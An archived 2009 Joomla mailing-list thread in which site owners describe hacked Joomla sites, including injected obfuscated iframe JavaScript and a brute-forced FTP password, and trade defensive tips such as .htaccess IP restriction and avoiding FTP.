NYCPHP Meetup

NYPHP.org

[joomla] several 1.0 sites hacked this week!

Barrie North barrie at compassdesigns.net
Thu Mar 26 20:04:54 EDT 2009 

We found the attacks/IP in the server logs. A financially backed hacker
outfit from Nigeria, go figure. The joys of having a PR9 site =P

Our password was 10 chars including letters, numbers and punctuation. We are
hosted on a "secured" rackspace server.

We don't have FTP running any more!

Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html


On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:

> Hello Barrie,
>
> May I inquire as to how you verified the attack?  I know that FTP
> bruteforcing is extremely difficult, and that is very improbable.
> What you may have faced was a dictionary attack, which may have worked
> with some luck if you had a weak password.  A password including a mix
> of
>
> 1) UPPERCASE
> 2) lowercase
> 3) punctuation/!#$.,
> 4) numbers
>
> and have a good strong/long password you would never fall victim to
> dictionary.
>
> As for bruteforce, an ftpd simply denies access after 3 or 5
> (configurable, usually defaults to 3) failed login attempts for some
> time.  Some hosts go as far as restricting ftp access until you call
> them and verify the problem.  Also, brute forcing over a TCP pipe a
> slow protocol such as FTP is virtually impossible.  At this rate it
> would take YEARS to bruteforce the password if not DECADES.
>
> @ Other users
> Also make sure to go into joomla user configuration and change the
> username of 'admin' to something else.
> To protect your joomla administation section  If you have a static ip,
> you can add
>
> order allow,deny
> deny from all
> allow from your.static.ip.here
>
> to a file called .htaccess in your administration folder.  If for some
> reason your ip changes and you get locked out, simply login via FTP
> and update the .htaccess file.  There are some other advanced methods
> for protecting your administration folder.
>
> Also, FTP was a protocol developed 30+ years ago.  It is not secure,
> clear text authentication, etc.  FTP must go.  If you can help it, do
> not use ftp, instead SFTP, or SSH.  Just.. anything but FTP.  Sadly,
> thats all that is easy to use, highly available across all hosts, and
> not everyone on shared hosting provides SSH access.  If you can do
> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
>
> I have seen more sites hacked due to unpatched php or bad php
> code(mostly from 3rd party addons) more than I have with FTP though.
>
> Still with good security practices you can reduce the risk considerably.
>
> Peace.
>
>
>
>
> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> > We got hacked last month by a brute force attack on our FTP password.
> Once
> > they had that, they got into the Joomla files.
> >
> > Any site can be hacked. The other half of the equation is vigilance and
> > backups :)
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> >
> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
> wrote:
> >>
> >> Several of my clients' 1.0.15 sites have been hacked this week!  Is
> >> there a problem with 1.0?
> >>
> >> I don't see an announcement on joomla.org
> >>
> >> I just saw that my site was hacked the other day. Fortunately they
> >> bunged it up a bit, so the code didn't run, but instead gave an error
> >> message.
> >>
> >> What they had done is append javascript to the index.php file. It was
> >> disguised as ascii codes, and there were several var defined and
> >> substituted in, but the result was that it attempted to open a hidden
> >> iframe directed to siplank.com. When I tried to open siplank.com in a
> >> web browser (yes, I did that! I do lots of crazy things out of
> >> curiosity) Firefox stopped it with a warning about the site being known
> >> for malware.
> >>
> >> I'm running 1.5.9 on a shared host. I will be calling my host and asking
> >> them what they can find out from their logs as to what happened.
> >>
> >> _______________________________________________
> >> New York PHP SIG: Joomla! Mailing List
> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >>
> >> NYPHPCon 2006 Presentations Online
> >> http://www.nyphpcon.com
> >>
> >> Show Your Participation in New York PHP
> >> http://www.nyphp.org/show_participation.php
> >
> >
> > _______________________________________________
> > New York PHP SIG: Joomla! Mailing List
> > http://lists.nyphp.org/mailman/listinfo/joomla
> >
> > NYPHPCon 2006 Presentations Online
> > http://www.nyphpcon.com
> >
> > Show Your Participation in New York PHP
> > http://www.nyphp.org/show_participation.php
> >
> _______________________________________________
> New York PHP SIG: Joomla! Mailing List
> http://lists.nyphp.org/mailman/listinfo/joomla
>
> NYPHPCon 2006 Presentations Online
> http://www.nyphpcon.com
>
> Show Your Participation in New York PHP
> http://www.nyphp.org/show_participation.php
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.nyphp.org/pipermail/joomla/attachments/20090326/6ca40123/attachment.html>

More information about the Joomla mailing list